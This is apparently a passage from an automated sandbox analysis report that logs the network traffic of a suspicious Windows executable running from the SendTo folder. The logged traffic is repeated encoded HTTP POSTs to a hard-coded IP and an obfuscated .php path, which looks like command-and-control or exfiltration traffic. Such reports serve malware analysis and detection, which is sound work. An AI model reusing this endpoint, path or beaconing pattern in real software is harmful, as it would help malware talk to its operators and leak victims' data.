                                          Sep 13, 2024 21:04:40.695307016 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.701647997 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.051325083 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.058347940 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.058399916 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.058710098 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.437607050 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.551249027 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.567092896 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.685610056 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.686017990 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.691210985 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.691243887 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.691278934 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.691342115 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.691427946 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.696367025 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.039100885 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.044233084 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.044289112 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.044320107 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.270715952 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.271042109 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.276101112 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.276170969 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.276241064 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.276323080 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.276329041 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.281522036 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.397478104 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.402622938 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.402683020 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.403116941 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.408118963 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.056803942 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.148972988 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.254374027 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:43.254456997 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:43.423708916 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.423774004 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:43.423782110 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.423871994 CEST5681080192.168.2.431.177.108.211

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 13, 2024 21:02:23.590082884 CEST53528651.1.1.1192.168.2.4

                                          HTTP Request Dependency Graph

                                          • 31.177.108.211

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44973431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:21.987354994 CEST577OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 344
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:22.346550941 CEST344OUTData Raw: 00 06 04 06 06 01 04 00 05 06 02 01 02 07 01 07 00 01 05 00 02 03 03 09 03 04 0d 00 05 07 03 09 0d 0f 03 09 01 54 03 0a 0e 05 07 05 04 07 07 04 04 50 0f 08 0c 07 04 05 07 03 06 54 04 05 07 5d 00 53 0a 00 04 0e 05 05 0e 04 0c 01 0f 00 0c 54 05 04
                                          Data Ascii: TPT]ST]XU\L}Ph^vtL~YvK|hBr_clxh]pycKxYuZhmsPtw^}_~V@A{}~~Lu
                                          Sep 13, 2024 21:02:22.732584000 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:22.995029926 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 35 36 34 0d 0a 56 4a 7e 05 6c 6e 77 44 7b 5b 64 46 7f 72 7c 5f 7d 67 70 54 7e 60 62 50 79 4d 52 4c 7d 04 7c 49 60 5d 72 53 7a 61 53 4b 77 66 59 59 6a 4b 78 01 55 4b 71 0b 63 71 7f 4a 68 62 58 5c 68 67 7e 4e 6f 58 60 41 6a 5d 77 04 75 71 62 5f 60 4f 6a 5b 6b 62 61 5c 7e 0a 7c 4e 7e 67 78 5b 75 76 7b 06 7c 5c 50 5d 7c 63 72 5b 7b 59 5e 01 6f 5e 60 00 78 43 60 5b 6d 62 56 49 78 05 7d 5e 68 63 7f 5f 6c 5e 7c 00 7e 4c 7f 4f 62 61 59 5a 7a 51 41 5b 68 5e 6b 50 7d 61 7d 41 76 42 60 02 7a 6c 7f 5d 77 60 62 41 7a 07 72 5c 7d 42 54 4e 6f 61 71 5a 75 5d 5d 07 61 4f 56 4f 77 5f 50 50 7e 5d 79 5f 77 4c 6e 5d 76 66 68 09 7f 42 65 04 60 6f 68 04 7f 70 7c 02 78 6f 6c 5a 6c 5e 66 03 7c 6d 7f 51 74 74 7c 03 7e 62 54 09 7e 7d 70 52 6f 53 61 5d 6a 71 75 03 7b 5d 46 51 7f 42 70 0d 69 4e 7b 53 7e 77 5b 58 78 53 63 03 7b 04 6b 58 6b 5f 56 5e 6a 67 6f 42 6b 5e 69 0d 6d 63 68 04 7d 04 64 01 77 60 65 51 7b 5c 79 02 76 76 5a 48 7e 66 5a 03 7d 66 69 0d 74 62 73 44 7c 72 65 42 7c 59 54 43 7b 66 6c 42 7e 73 55 49 75 5c 5f 06 74 [TRUNCATED]
                                          Data Ascii: 564VJ~lnwD{[dFr|_}gpT~`bPyMRL}|I`]rSzaSKwfYYjKxUKqcqJhbX\hg~NoX`Aj]wuqb_`Oj[kba\~|N~gx[uv{|\P]|cr[{Y^o^`xC`[mbVIx}^hc_l^|~LObaYZzQA[h^kP}a}AvB`zl]w`bAzr\}BTNoaqZu]]aOVOw_PP~]y_wLn]vfhBe`ohp|xolZl^f|mQtt|~bT~}pRoSa]jqu{]FQBpiN{S~w[XxSc{kXk_V^jgoBk^imch}dw`eQ{\yvvZH~fZ}fitbsD|reB|YTC{flB~sUIu\_tO_I~ar~|t}Iku_Yxb}}^S{YhxIlOx}gybd{Mr|NpxYV|rou_xI}lsK|YR}aS@wlp{BxvpnNzay}RTLzqvu]wIuaVNvqnN|^ztL}uu|laMvlZOcpJxloKxNjD|CxtIRArv}Ss{}n}ri@|pp|Rt~pR}wn{CcxLRH_{J|gc@|puzM|}btwMayquuvV}fhM}fatL{L}If{fxO|ckuLqNvam~qz|d}YYvazbuG}puywpLywh{mYKzbV{Mn{]NZywV}\Qv_d|{h^tOhqXPaU|Axw\c`vmbyJilj_z\y\}b`g{ZL~Jx^[^vq~\v[ZAUu`RcXh`IxRRY{YeXhSRAvdkZi\vAzSYQ`~_ARqg|{NkoCSAekuGWtXUcGU@QpSRMyK}]RMixcsaBzbv^aXdEiutO~_mOcqgk\[}daT{f`Bz]Bq[\Z[zCUbWART@jktbm||\WY|wxZL{Yt@{CX{u_o`AP|o]WdUjZ]f|zS^VJsbP~KqQN_ogGZsOnXEkyZo_GZ^q^Z]LucSyEp_O\boNRHcU@is_lZDW_}Eh~lPvZsyge~KzTRTWu [TRUNCATED]
                                          Sep 13, 2024 21:02:22.995266914 CEST337INData Raw: 77 7a 56 6e 60 00 42 52 7e 63 5f 58 60 05 5e 6d 07 09 02 5a 5c 63 4b 56 67 7f 41 6a 75 6d 51 76 5f 78 65 67 4f 79 46 7b 5e 57 55 54 01 7b 4b 57 60 56 40 5a 5a 01 5c 5b 06 6e 45 55 7d 79 04 64 55 73 4d 6a 60 7b 05 71 59 64 45 54 6e 6a 5c 69 77 7a
                                          Data Ascii: wzVn`BR~c_X`^mZ\cKVgAjumQv_xegOyF{^WUT{KW`V@ZZ\[nEU}ydUsMj`{qYdETnj\iwzgRtlkt\zzx_maFWaXScUoFWqZBbbbYh`x{^{qQN_ogGZsOnXEk}@W[aAZZ`F\p^[bbP~]yx[rYr{zSofLXow]x^NZl`DVsKhULaA^Tq[WndT|SX_~rqB|NtAApJyYUTQuGQnVC
                                          Sep 13, 2024 21:02:23.084028006 CEST5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0
                                          Sep 13, 2024 21:02:23.377672911 CEST553OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 384
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:23.637963057 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:23.638237000 CEST384OUTData Raw: 5b 54 43 50 55 40 5c 57 59 5f 51 51 52 5e 54 56 5a 58 5a 5f 55 5e 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TCPU@\WY_QQR^TVZXZ_U^SIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A?/979]#9*+&T+Y%*((Z50<U1 &,4_';9[&!^-
                                          Sep 13, 2024 21:02:23.883778095 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 54 28 08 27 13 27 15 2c 0d 2c 3d 36 51 24 11 24 5a 3c 0d 32 1d 29 3d 3c 58 39 29 3e 5b 33 3b 31 58 30 02 0e 04 24 2f 2f 1b 3e 3a 2e 46 0d 1d 26 01 3d 11 0e 52 2a 00 28 59 33 00 26 05 37 0e 27 5a 24 3c 3b 11 37 5a 26 5c 37 54 27 54 32 3a 25 59 2f 43 32 17 29 22 21 07 34 0c 2e 55 0f 15 3a 08 26 1f 22 55 3f 0c 0d 13 29 3c 29 09 27 3c 20 0e 26 5d 2f 0b 25 3b 2d 0f 24 3f 26 01 26 57 23 5b 2b 3e 22 0c 36 1f 29 0b 36 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989T('',,=6Q$$Z<2)=<X9)>[3;1X0$//>:.F&=R*(Y3&7'Z$<;7Z&\7T'T2:%Y/C2)"!4.U:&"U?)<)'< &]/%;-$?&&W#[+>"6)6+'T#(V3YT0
                                          Sep 13, 2024 21:02:23.884469032 CEST553OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 384
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:24.125427008 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:24.125612974 CEST384OUTData Raw: 5b 57 46 51 50 46 59 55 59 5f 51 51 52 51 54 55 5a 5c 5a 59 55 53 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFQPFYUY_QQRQTUZ\ZYUSSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:??% 1&43%*(5(/=Y=^8+?)$0,$*7B1/$%9[&!^-
                                          Sep 13, 2024 21:02:24.370389938 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0f 29 36 2b 54 33 02 28 08 3b 2e 36 57 30 3c 3b 01 2b 1d 36 1d 3c 2d 3b 05 2c 29 2a 5f 26 3b 0f 5c 30 05 33 12 24 11 09 57 2a 10 2e 46 0d 1d 25 58 2a 3f 0e 52 3e 3e 34 13 26 2e 00 00 37 20 20 04 27 06 3c 0e 21 3c 2a 11 23 0c 2f 1e 26 2a 22 03 3b 1b 29 04 3e 1f 32 5a 20 26 2e 55 0f 15 39 1a 25 57 26 55 2b 0c 01 5a 3d 06 3e 1f 27 2f 01 56 27 2b 2f 0e 25 3b 3a 1e 31 3f 04 04 26 21 0d 5a 3c 03 21 57 22 1f 00 56 35 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:)6+T3(;.6W0<;+6<-;,)*_&;\03$W*.F%X*?R>>4&.7 '<!<*#/&*";)>2Z &.U9%W&U+Z=>'/V'+/%;:1?&!Z<!W"V5'T#(V3YT0
                                          Sep 13, 2024 21:02:24.371040106 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 1400
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:24.609940052 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:24.610234022 CEST1400OUTData Raw: 5e 56 46 55 55 4a 59 53 59 5f 51 51 52 59 54 55 5a 5d 5a 51 55 53 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFUUJYSY_QQRYTUZ]ZQUSSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+\77**6<))^4P+"'3+%8%&;9[&!^-;
                                          Sep 13, 2024 21:02:25.050076008 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 1d 3f 08 33 51 25 3b 33 55 2c 5b 3d 08 24 11 0e 5a 29 20 25 40 3c 03 3c 58 2e 5c 32 5f 30 3b 36 01 27 12 0d 1f 33 01 02 0b 3e 3a 2e 46 0d 1d 26 07 3e 3f 06 1d 3e 3e 33 01 26 3d 3d 1a 37 09 24 05 24 2f 24 0f 37 05 31 02 23 22 23 53 31 39 25 58 2d 35 29 07 2a 0f 3e 1c 21 36 2e 55 0f 15 3a 0f 26 0f 2a 1d 29 22 2c 02 3e 3f 3a 56 32 3f 27 1c 32 05 28 53 27 28 08 57 31 2f 22 03 31 31 0d 5a 3f 3d 0f 53 22 21 03 0b 36 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989?3Q%;3U,[=$Z) %@<<X.\2_0;6'3>:.F&>?>>3&==7$$/$71#"#S19%X-5)*>!6.U:&*)",>?:V2?'2(S'(W1/"11Z?=S"!6;'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.44973631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:23.512667894 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:23.863250017 CEST2532OUTData Raw: 5e 55 46 56 50 41 59 50 59 5f 51 51 52 5a 54 5a 5a 5f 5a 51 55 5e 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UFVPAYPY_QQRZTZZ_ZQU^SEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@<Y17%#6>:=/-_+;4P+Z6X'#T1)+&Y(_%9[&!^-/
                                          Sep 13, 2024 21:02:24.269428015 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:24.404721022 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.45666531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:24.606585026 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:24.957412004 CEST2532OUTData Raw: 5b 56 46 51 50 46 5c 51 59 5f 51 51 52 5a 54 54 5a 59 5a 58 55 53 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFQPF\QY_QQRZTTZYZXUSSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<?!72Y#3-Z)8&R<^)87<<.'U(V$*41?0X19[&!^-/
                                          Sep 13, 2024 21:02:25.376363039 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:25.533644915 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.45666631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:26.667722940 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:27.019741058 CEST2532OUTData Raw: 5e 56 43 51 50 44 5c 50 59 5f 51 51 52 5e 54 50 5a 53 5a 5a 55 51 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VCQPD\PY_QQR^TPZSZZUQSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+?641)43&*8:U??!=+),5$0/17D1?<&+9[&!^-
                                          Sep 13, 2024 21:02:27.420001984 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:27.573883057 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.45666731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:27.724827051 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:28.100060940 CEST2532OUTData Raw: 5b 53 46 52 50 40 5c 50 59 5f 51 51 52 5d 54 56 5a 5b 5a 5c 55 56 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SFRP@\PY_QQR]TVZ[Z\UVSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B?)#1=_ 3X=&?Y9Z+84)?&Y3/&)4&?&9[&!^-3
                                          Sep 13, 2024 21:02:28.496382952 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:28.627744913 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.45667031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:30.074440956 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2100
                                          Expect: 100-continue
                                          Connection: Keep-Alive
